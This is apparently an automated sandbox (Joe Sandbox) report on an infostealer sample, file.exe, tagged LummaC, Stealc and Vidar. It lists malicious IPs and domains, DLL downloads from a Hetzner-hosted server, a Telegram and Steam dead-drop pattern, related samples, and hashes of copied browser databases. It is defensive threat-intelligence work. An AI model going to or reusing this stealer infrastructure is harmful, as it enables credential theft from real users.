                          https://t.me/iyigunlhellosqlr.dllsqlite3.dllInTenant.pif, 0000000B.00000003.3255137862.0000000004522000.00000004.00000800.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000003.3255083848.0000000001790000.00000004.00000800.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4068394882.0000000000151000.00000040.00001000.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000003.3254895213.0000000001511000.00000004.00000800.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4072894428.00000000013CA000.00000004.00000020.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4074431990.0000000001764000.00000004.00000800.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000003.3254796660.00000000015AE000.00000004.00000800.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4074431990.000000000178F000.00000004.00000800.00020000.00000000.sdmptrue
                          • Avira URL Cloud: safe
                          unknown
                          https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchKEBKJD.11.drfalse
                          • URL Reputation: safe
                          unknown
                          https://94.130.188.148/mozglue.dllqTenant.pif, 0000000B.00000002.4073444723.0000000001510000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: malware
                          unknown
                          https://community.akamai.steamstatic.com/public/javascript/webui/clientcom.js?v=od0wu57c9_w6&amp;l=eTenant.pif, 0000000B.00000002.4068394882.0000000000186000.00000040.00001000.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4073444723.0000000001510000.00000004.00000800.00020000.00000000.sdmp, 76561199761128941[1].htm.11.drfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://steamcommunity.com/workshop/Tenant.pif, 0000000B.00000002.4073357745.0000000001488000.00000004.00000020.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4068394882.0000000000186000.00000040.00001000.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4073444723.0000000001510000.00000004.00000800.00020000.00000000.sdmp, 76561199761128941[1].htm.11.drfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://94.130.188.148/sqlr.dll1Tenant.pif, 0000000B.00000002.4073357745.0000000001488000.00000004.00000020.00020000.00000000.sdmptrue
                          • Avira URL Cloud: malware
                          unknown
                          https://store.steampowered.com/legal/Tenant.pif, 0000000B.00000002.4068394882.0000000000186000.00000040.00001000.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4073444723.0000000001510000.00000004.00000800.00020000.00000000.sdmp, 76561199761128941[1].htm.11.drfalse
                          • URL Reputation: safe
                          unknown
                          http://stadiatechnologies.1f19464;Tenant.pif, 0000000B.00000002.4068394882.0000000000186000.00000040.00001000.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://community.akamai.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&amp;l=eTenant.pif, 0000000B.00000002.4068394882.0000000000186000.00000040.00001000.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4073444723.0000000001510000.00000004.00000800.00020000.00000000.sdmp, 76561199761128941[1].htm.11.drfalse
                          • URL Reputation: safe
                          unknown
                          http://www.sqlite.org/copyright.html.Tenant.pif, 0000000B.00000002.4078109784.000000000C927000.00000004.00000800.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4077975968.000000000C51D000.00000002.00001000.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          https://94.130.188.148DGITenant.pif, 0000000B.00000002.4068394882.00000000002BC000.00000040.00001000.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://94.130.188.148JKFTenant.pif, 0000000B.00000002.4068394882.00000000002BC000.00000040.00001000.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://community.akamai.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=pSvTenant.pif, 0000000B.00000002.4068394882.0000000000186000.00000040.00001000.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4073444723.0000000001510000.00000004.00000800.00020000.00000000.sdmp, 76561199761128941[1].htm.11.drfalse
                          • URL Reputation: safe
                          unknown
                          https://community.akamai.steamstatic.com/public/shared/css/motiva_sans.css?v=-DH0xTYpnVe2&amp;l=engl76561199761128941[1].htm.11.drfalse
                          • URL Reputation: safe
                          unknown
                          https://www.google.com/images/branding/product/ico/googleg_lodp.icoKEBKJD.11.drfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://94.130.188.148/msvcp140.dllITenant.pif, 0000000B.00000002.4073444723.0000000001510000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: malware
                          unknown
                          http://upx.sf.netAmcache.hve.17.drfalse
                          • URL Reputation: safe
                          unknown
                          https://store.steampowered.com/76561199761128941[1].htm.11.drfalse
                          • URL Reputation: safe
                          unknown
                          https://community.akamai.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvwTenant.pif, 0000000B.00000002.4068394882.0000000000186000.00000040.00001000.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4073444723.0000000001510000.00000004.00000800.00020000.00000000.sdmp, 76561199761128941[1].htm.11.drfalse
                          • URL Reputation: safe
                          unknown
                          • No. of IPs < 25%
                          • 25% < No. of IPs < 50%
                          • 50% < No. of IPs < 75%
                          • 75% < No. of IPs
IP              Domain                  Country        ASN    ASN Name             Malicious
95.164.119.162  stadiatechnologies.com  Gibraltar      39762  VAKPoltavaUkraineUA  true
23.197.127.21   steamcommunity.com      United States  20940  AKAMAI-ASN1EU        true
94.130.188.148  unknown                 Germany        24940  HETZNER-ASDE         true
                          Joe Sandbox version:40.0.0 Tourmaline
                          Analysis ID:1501386
                          Start date and time:2024-08-29 20:46:05 +02:00
                          Joe Sandbox product:CloudBasic
                          Overall analysis duration:0h 9m 9s
                          Hypervisor based Inspection enabled:false
                          Report type:full
                          Cookbook file name:default.jbs
                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:19
                          Number of new started drivers analysed:0
                          Number of existing processes analysed:0
                          Number of existing drivers analysed:0
                          Number of injected processes analysed:0
                          Technologies:
                          • HCA enabled
                          • EGA enabled
                          • AMSI enabled
                          Analysis Mode:default
                          Analysis stop reason:Timeout
                          Sample name:file.exe
                          Detection:MAL
                          Classification:mal100.troj.spyw.evad.winEXE@23/36@3/3
                          EGA Information:
                          • Successful, ratio: 100%
                          HCA Information:
                          • Successful, ratio: 100%
                          • Number of executed functions: 88
                          • Number of non-executed functions: 303
                          Cookbook Comments:
                          • Found application associated with file extension: .exe
                          • Override analysis time to 240000 for current running targets taking high CPU consumption
                          • Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                          • Excluded IPs from analysis (whitelisted): 104.208.16.94
                          • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, login.live.com, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, 6.d.a.8.b.e.f.b.0.0.0.0.0.0.0.0.4.0.0.a.0.0.1.f.1.1.1.0.1.0.a.2.ip6.arpa, fe3cr.delivery.mp.microsoft.com, onedsblobprdcus16.centralus.cloudapp.azure.com
• Not all processes were analyzed, report is missing behavior information
                          • Report size exceeded maximum capacity and may have missing behavior information.
                          • Report size exceeded maximum capacity and may have missing disassembly code.
                          • Report size getting too big, too many NtOpenFile calls found.
                          • Report size getting too big, too many NtOpenKeyEx calls found.
                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                          • Report size getting too big, too many NtQueryAttributesFile calls found.
                          • Report size getting too big, too many NtQueryValueKey calls found.
                          • Report size getting too big, too many NtSetInformationFile calls found.
                          • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                          • VT rate limit hit for: file.exe
Time      Type             Description
14:46:52  API Interceptor  1x Sleep call for process: file.exe modified
14:47:31  API Interceptor  3570x Sleep call for process: Tenant.pif modified
14:50:17  API Interceptor  1x Sleep call for process: WerFault.exe modified
Match           Associated Sample Name / URL  Detection  Threat Name            Context
95.164.119.162  file.exe                      malicious  LummaC, Vidar          stadiatechnologies.com/
                file.exe                      malicious  LummaC, Vidar          stadiatechnologies.com/
                file.exe                      malicious  LummaC, Stealc, Vidar  stadiatechnologies.com/
                file.exe                      malicious  LummaC, Vidar          stadiatechnologies.com/
                file.exe                      malicious  LummaC, Vidar          stadiatechnologies.com/
                file.exe                      malicious  LummaC, Vidar          stadiatechnologies.com/
                file.exe                      malicious  LummaC, Stealc, Vidar  stadiatechnologies.com/
                file.exe                      malicious  LummaC, Vidar          stadiatechnologies.com/
                file.exe                      malicious  LummaC, Vidar          stadiatechnologies.com/
                file.exe                      malicious  LummaC, Vidar          stadiatechnologies.com/
23.197.127.21   http://steamcomunity.aiq.ru/  malicious  Unknown                steamcommunity.com/
94.130.188.148  file.exe                      malicious  LummaC, Vidar
                file.exe                      malicious  LummaC, Vidar
                file.exe                      malicious  LummaC, Vidar
                file.exe                      malicious  LummaC, Stealc, Vidar
                file.exe                      malicious  LummaC, Vidar
                file.exe                      malicious  LummaC, Vidar
                file.exe                      malicious  LummaC, Vidar
                file.exe                      malicious  LummaC, Vidar
                Setup.exe                     malicious  Vidar
                file.exe                      malicious  Vidar
Match | Associated Sample Name / URL | Detection | Threat Name | Context
stadiatechnologies.com | file.exe | malicious | LummaC, Vidar | 95.164.119.162
stadiatechnologies.com | file.exe | malicious | LummaC, Vidar | 95.164.119.162
stadiatechnologies.com | file.exe | malicious | LummaC, Stealc, Vidar | 95.164.119.162
stadiatechnologies.com | file.exe | malicious | LummaC, Vidar | 95.164.119.162
stadiatechnologies.com | file.exe | malicious | LummaC, Vidar | 95.164.119.162
stadiatechnologies.com | file.exe | malicious | LummaC, Vidar | 95.164.119.162
stadiatechnologies.com | file.exe | malicious | LummaC, Stealc, Vidar | 95.164.119.162
stadiatechnologies.com | file.exe | malicious | LummaC, Vidar | 95.164.119.162
stadiatechnologies.com | file.exe | malicious | LummaC, Vidar | 95.164.119.162
stadiatechnologies.com | file.exe | malicious | LummaC, Vidar | 95.164.119.162
steamcommunity.com | file.exe | malicious | LummaC, Vidar | 23.199.218.33
steamcommunity.com | file.exe | malicious | LummaC, Vidar | 23.192.247.89
steamcommunity.com | file.exe | malicious | LummaC, Vidar | 23.192.247.89
steamcommunity.com | file.exe | malicious | LummaC, Stealc, Vidar | 23.197.127.21
steamcommunity.com | file.exe | malicious | LummaC, Vidar | 23.197.127.21
steamcommunity.com | file.exe | malicious | LummaC, Vidar | 23.197.127.21
steamcommunity.com | file.exe | malicious | LummaC, Vidar | 2.18.131.137
steamcommunity.com | file.exe | malicious | LummaC, Vidar | 23.192.247.89
steamcommunity.com | Setup.exe | malicious | Vidar | 23.214.234.105
steamcommunity.com | file.exe | malicious | Vidar | 23.197.127.21
Match | Associated Sample Name / URL | Detection | Threat Name | Context
VAKPoltavaUkraineUA | file.exe | malicious | LummaC, Vidar | 95.164.119.162
VAKPoltavaUkraineUA | file.exe | malicious | LummaC, Vidar | 95.164.119.162
VAKPoltavaUkraineUA | file.exe | malicious | LummaC, Stealc, Vidar | 95.164.119.162
VAKPoltavaUkraineUA | file.exe | malicious | LummaC, Vidar | 95.164.119.162
VAKPoltavaUkraineUA | file.exe | malicious | LummaC, Vidar | 95.164.119.162
VAKPoltavaUkraineUA | file.exe | malicious | LummaC, Vidar | 95.164.119.162
VAKPoltavaUkraineUA | file.exe | malicious | LummaC, Stealc, Vidar | 95.164.119.162
VAKPoltavaUkraineUA | file.exe | malicious | LummaC, Vidar | 95.164.119.162
VAKPoltavaUkraineUA | file.exe | malicious | LummaC, Vidar | 95.164.119.162
VAKPoltavaUkraineUA | file.exe | malicious | LummaC, Vidar | 95.164.119.162
HETZNER-ASDE | Sepco RFQ.xls | malicious | Remcos | 88.99.66.38
HETZNER-ASDE | Thermo Fisher RFQ_TFS-1805.xls | malicious | GuLoader | 88.99.66.38
HETZNER-ASDE | Swift Payment.xls | malicious | FormBook | 88.99.66.38
HETZNER-ASDE | Paul Agrotis List.xls | malicious | FormBook | 88.99.66.38
HETZNER-ASDE | http://control.frilix.com/grace/fxc/aW5mby5jcmVkaXRldXJlbkBicmVkYS5ubA== | malicious | HTMLPhisher | 88.99.252.96
HETZNER-ASDE | IDM_ACT.exe | malicious | Fredy Stealer | 5.161.243.5
HETZNER-ASDE | IDM_ACT.exe | malicious | Fredy Stealer | 5.161.243.5
HETZNER-ASDE | PMT-INV0230824AUG.xla.xlsx | malicious | Remcos | 88.99.66.38
HETZNER-ASDE | PO-014842-2.xls | malicious | FormBook | 88.99.66.38
HETZNER-ASDE | ORDER.xls | malicious | Unknown | 88.99.66.38
AKAMAI-ASN1EU | https://cvccworks-my.sharepoint.com/:o:/g/personal/tbrosseau_cvccworks_edu/Eq-UyPVcAplCp0EtULhG-vgBSBG-0YnvqRHIOFaj8gAVeA?e=0GtZle&c=E,1,DChFGbEapD80-9FdFFEzIgnps7b6noVGZQKGJYQxe5NZ1bO4xoHQSXTZoDZYFQom26YXPkpXr4g-Zcy6HwaX1DHyE-5Bk2WBwo9od82Z27DPdBWYzulyG2zvnA,,&typo=1 | malicious | HTMLPhisher | 2.16.164.49
AKAMAI-ASN1EU | file.exe | malicious | Unknown | 23.44.133.38
AKAMAI-ASN1EU | http://www.water-filter.com | malicious | HTMLPhisher | 23.67.131.235
AKAMAI-ASN1EU | file.exe | malicious | Unknown | 23.219.161.132
AKAMAI-ASN1EU | file.exe | malicious | Unknown | 23.44.133.57
AKAMAI-ASN1EU | file.exe | malicious | Unknown | 23.200.0.9
AKAMAI-ASN1EU | 5qckfVuvzX.exe | malicious | RHADAMANTHYS | 172.236.107.96
AKAMAI-ASN1EU | file.exe | malicious | Unknown | 23.219.161.132
AKAMAI-ASN1EU | file.exe | malicious | Unknown | 23.219.161.132
AKAMAI-ASN1EU | file.exe | malicious | Unknown | 23.200.0.42
Match | Associated Sample Name / URL | Detection | Threat Name | Context
51c64c77e60f3980eea90869b68c58a8 | file.exe | malicious | LummaC, Vidar | 94.130.188.148
51c64c77e60f3980eea90869b68c58a8 | file.exe | malicious | LummaC, Vidar | 94.130.188.148
51c64c77e60f3980eea90869b68c58a8 | file.exe | malicious | LummaC, Vidar | 94.130.188.148
51c64c77e60f3980eea90869b68c58a8 | file.exe | malicious | LummaC, Stealc, Vidar | 94.130.188.148
51c64c77e60f3980eea90869b68c58a8 | file.exe | malicious | LummaC, Vidar | 94.130.188.148
51c64c77e60f3980eea90869b68c58a8 | file.exe | malicious | LummaC, Vidar | 94.130.188.148
51c64c77e60f3980eea90869b68c58a8 | file.exe | malicious | LummaC, Vidar | 94.130.188.148
51c64c77e60f3980eea90869b68c58a8 | file.exe | malicious | LummaC, Vidar | 94.130.188.148
51c64c77e60f3980eea90869b68c58a8 | Setup.exe | malicious | Vidar | 94.130.188.148
51c64c77e60f3980eea90869b68c58a8 | file.exe | malicious | Vidar | 94.130.188.148
37f463bf4616ecd445d4a1937da06e19 | Invoice.wsf | malicious | AsyncRAT, PureLog Stealer | 23.197.127.21
37f463bf4616ecd445d4a1937da06e19 | x64_installer__v4.6.0.msi | malicious | Unknown | 23.197.127.21
37f463bf4616ecd445d4a1937da06e19 | SHIPMENT_DOCMSS24071327.exe | malicious | GuLoader | 23.197.127.21
37f463bf4616ecd445d4a1937da06e19 | hhs.exe | malicious | Unknown | 23.197.127.21
37f463bf4616ecd445d4a1937da06e19 | x64_installer__v4.5.9.msi | malicious | Unknown | 23.197.127.21
37f463bf4616ecd445d4a1937da06e19 | 3Ojkq6hcM1.msi | malicious | Unknown | 23.197.127.21
37f463bf4616ecd445d4a1937da06e19 | Nettably.exe | malicious | Snake Keylogger | 23.197.127.21
37f463bf4616ecd445d4a1937da06e19 | WEAREX_IHRACAT.exe | malicious | GuLoader | 23.197.127.21
37f463bf4616ecd445d4a1937da06e19 | Fordybendes.exe | malicious | Azorult, GuLoader | 23.197.127.21
Match | Associated Sample Name / URL | Detection | Threat Name
C:\ProgramData\freebl3.dll | file.exe | malicious | Stealc, Vidar
C:\ProgramData\freebl3.dll | eSLlhErJ0q.exe | malicious | LummaC, Stealc, Vidar
C:\ProgramData\freebl3.dll | file.exe | malicious | Stealc, Vidar
C:\ProgramData\freebl3.dll | file.exe | malicious | Stealc, Vidar
C:\ProgramData\freebl3.dll | file.exe | malicious | Stealc, Vidar
C:\ProgramData\freebl3.dll | file.exe | malicious | Stealc, Vidar
C:\ProgramData\freebl3.dll | file.exe | malicious | Stealc, Vidar
C:\ProgramData\freebl3.dll | file.exe | malicious | LummaC, Vidar
C:\ProgramData\freebl3.dll | file.exe | malicious | Stealc, Vidar
C:\ProgramData\freebl3.dll | file.exe | malicious | Stealc, Vidar
C:\ProgramData\mozglue.dll | file.exe | malicious | Stealc, Vidar
C:\ProgramData\mozglue.dll | eSLlhErJ0q.exe | malicious | LummaC, Stealc, Vidar
C:\ProgramData\mozglue.dll | file.exe | malicious | Stealc, Vidar
C:\ProgramData\mozglue.dll | file.exe | malicious | Stealc, Vidar
C:\ProgramData\mozglue.dll | file.exe | malicious | Stealc, Vidar
C:\ProgramData\mozglue.dll | file.exe | malicious | Stealc, Vidar
C:\ProgramData\mozglue.dll | file.exe | malicious | Stealc, Vidar
C:\ProgramData\mozglue.dll | file.exe | malicious | LummaC, Vidar
C:\ProgramData\mozglue.dll | file.exe | malicious | Stealc, Vidar
C:\ProgramData\mozglue.dll | file.exe | malicious | Stealc, Vidar
                                                                                      Process:C:\Users\user\AppData\Local\Temp\271973\Tenant.pif
                                                                                      File Type:ASCII text, with very long lines (1743), with CRLF line terminators
                                                                                      Category:modified
                                                                                      Size (bytes):9504
                                                                                      Entropy (8bit):5.512408163813622
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:nnPOeRnWYbBp6RJ0aX+H6SEXKxkHWNBw8D4Sl:PeegJUaJHEw90
                                                                                      MD5:1191AEB8EAFD5B2D5C29DF9B62C45278
                                                                                      SHA1:584A8B78810AEE6008839EF3F1AC21FD5435B990
                                                                                      SHA-256:0BF10710C381F5FCF42F9006D252E6CAFD2F18840865804EA93DAA06658F409A
                                                                                      SHA-512:86FF4292BF8B6433703E4E650B6A4BF12BC203EF4BBBB2BC0EEEA8A3E6CC1967ABF486EEDCE80704D1023C15487CC34B6B319421D73E033D950DBB1724ABADD5
                                                                                      Malicious:false
                                                                                      Preview:// Mozilla User Preferences....// DO NOT EDIT THIS FILE...//..// If you make changes to this file while the application is running,..// the changes will be overwritten when the application exits...//..// To change a preference value, you can either:..// - modify it via the UI (e.g. via about:config in the browser); or..// - set it within a user.js file in your profile.....user_pref("app.normandy.first_run", false);..user_pref("app.normandy.migrationsApplied", 12);..user_pref("app.normandy.user_id", "9e34c6e7-cbed-40a0-ba63-35488e171013");..user_pref("app.update.auto.migrated", true);..user_pref("app.update.background.rolledout", true);..user_pref("app.update.lastUpdateTime.browser-cleanup-thumbnails", 0);..user_pref("app.update.lastUpdateTime.recipe-client-addon-run", 1696426836);..user_pref("app.update.lastUpdateTime.region-update-timer", 0);..user_pref("app.update.lastUpdateTime.rs-experiment-loader-timer", 1696426837);..user_pref("app.update.lastUpdateTime.xpi-signature-verification
                                                                                      Process:C:\Users\user\AppData\Local\Temp\271973\Tenant.pif
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                      Category:dropped
                                                                                      Size (bytes):40960
                                                                                      Entropy (8bit):0.8553638852307782
                                                                                      Encrypted:false
                                                                                      SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                      MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                      SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                      SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                      SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                      Malicious:false
Preview:SQLite format 3 [binary remainder omitted]
                                                                                      Process:C:\Users\user\AppData\Local\Temp\271973\Tenant.pif
                                                                                      File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                                                      Category:dropped
                                                                                      Size (bytes):98304
                                                                                      Entropy (8bit):0.08235737944063153
                                                                                      Encrypted:false
                                                                                      SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                                                      MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                                                      SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                                                      SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                                                      SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                                                      Malicious:false
Preview:SQLite format 3 [binary remainder omitted]
                                                                                      Process:C:\Users\user\AppData\Local\Temp\271973\Tenant.pif
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):32768
                                                                                      Entropy (8bit):0.017262956703125623
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
                                                                                      MD5:B7C14EC6110FA820CA6B65F5AEC85911
                                                                                      SHA1:608EEB7488042453C9CA40F7E1398FC1A270F3F4
                                                                                      SHA-256:FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
                                                                                      SHA-512:D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
                                                                                      Malicious:false
                                                                                      Process:C:\Users\user\AppData\Local\Temp\271973\Tenant.pif
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                                                      Category:dropped
                                                                                      Size (bytes):20480
                                                                                      Entropy (8bit):0.6732424250451717
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                                                      MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                                                      SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                                                      SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                                                      SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                                                      Malicious:false
Preview:SQLite format 3 [binary remainder omitted]
                                                                                      Process:C:\Users\user\AppData\Local\Temp\271973\Tenant.pif
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                                                      Category:dropped
                                                                                      Size (bytes):196608
                                                                                      Entropy (8bit):1.121297215059106
                                                                                      Encrypted:false
                                                                                      SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                                                      MD5:D87270D0039ED3A5A72E7082EA71E305
                                                                                      SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                                                      SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                                                      SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                                                      Malicious:false
Preview:SQLite format 3 [binary remainder omitted]
                                                                                      Process:C:\Users\user\AppData\Local\Temp\271973\Tenant.pif
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 38, cookie 0x1f, schema 4, UTF-8, version-valid-for 1
                                                                                      Category:dropped
                                                                                      Size (bytes):155648
                                                                                      Entropy (8bit):0.5407252242845243
                                                                                      Encrypted:false
                                                                                      SSDEEP:96:OgWyejzH+bDoYysX0IxQzZkHtpVJNlYDLjGQLBE3CeE0kE:OJhH+bDo3iN0Z2TVJkXBBE3yb
                                                                                      MD5:7B955D976803304F2C0505431A0CF1CF
                                                                                      SHA1:E29070081B18DA0EF9D98D4389091962E3D37216
                                                                                      SHA-256:987FB9BFC2A84C4C605DCB339D4935B52A969B24E70D6DEAC8946BA9A2B432DC
                                                                                      SHA-512:CE2F1709F39683BE4131125BED409103F5EDF1DED545649B186845817C0D69E3D0B832B236F7C4FC09AB7F7BB88E7C9F1E4F7047D1AF56D429752D4D8CBED47A
                                                                                      Malicious:false
Preview:SQLite format 3 [binary remainder omitted]
                                                                                      Process:C:\Users\user\AppData\Local\Temp\271973\Tenant.pif
                                                                                      File Type:SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
                                                                                      Category:dropped
                                                                                      Size (bytes):5242880
                                                                                      Entropy (8bit):0.03859996294213402
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:58rJQaXoMXp0VW9FxWHxDSjENbx56p3DisuwAyHI:58r54w0VW3xWdkEFxcp3y/y
                                                                                      MD5:D2A38A463B7925FE3ABE31ECCCE66ACA
                                                                                      SHA1:A1824888F9E086439B287DEA497F660F3AA4B397
                                                                                      SHA-256:474361353F00E89A9ECB246EC4662682392EBAF4F2A4BE9ABB68BBEBE33FA4A0
                                                                                      SHA-512:62DB46A530D952568EFBFF7796106E860D07754530B724E0392862EF76FDF99043DA9538EC0044323C814DF59802C3BB55454D591362CB9B6E39947D11E981F7
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ ...................&...................K..................................j.....-a>.~...|0{dz.z.z"y.y3x.xKw.v.u.uGt.t;sAs.q.p.q.p{o.ohn.nem.n,m9l.k.lPj.j.h.h.g.d.c.c6b.b.a.a>..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                      Process:C:\Users\user\AppData\Local\Temp\271973\Tenant.pif
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):32768
                                                                                      Entropy (8bit):0.017262956703125623
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
                                                                                      MD5:B7C14EC6110FA820CA6B65F5AEC85911
                                                                                      SHA1:608EEB7488042453C9CA40F7E1398FC1A270F3F4
                                                                                      SHA-256:FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
                                                                                      SHA-512:D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
                                                                                      Malicious:false
                                                                                      Preview:..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                      Process:C:\Users\user\AppData\Local\Temp\271973\Tenant.pif
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                      Category:dropped
                                                                                      Size (bytes):106496
                                                                                      Entropy (8bit):1.136413900497188
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                                                      MD5:429F49156428FD53EB06FC82088FD324
                                                                                      SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                                                      SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                                                      SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                      Process:C:\Users\user\AppData\Local\Temp\271973\Tenant.pif
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 4
                                                                                      Category:dropped
                                                                                      Size (bytes):20480
                                                                                      Entropy (8bit):0.8439810553697228
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:TLyAF1kwNbXYFpFNYcw+6UwcQVXH5fBO9p7n52GmCWGf+dyMDCFVE1:TeAFawNLopFgU10XJBOB2Gbf+ba+
                                                                                      MD5:9D46F142BBCF25D0D495FF1F3A7609D3
                                                                                      SHA1:629BD8CD800F9D5B078B5779654F7CBFA96D4D4E
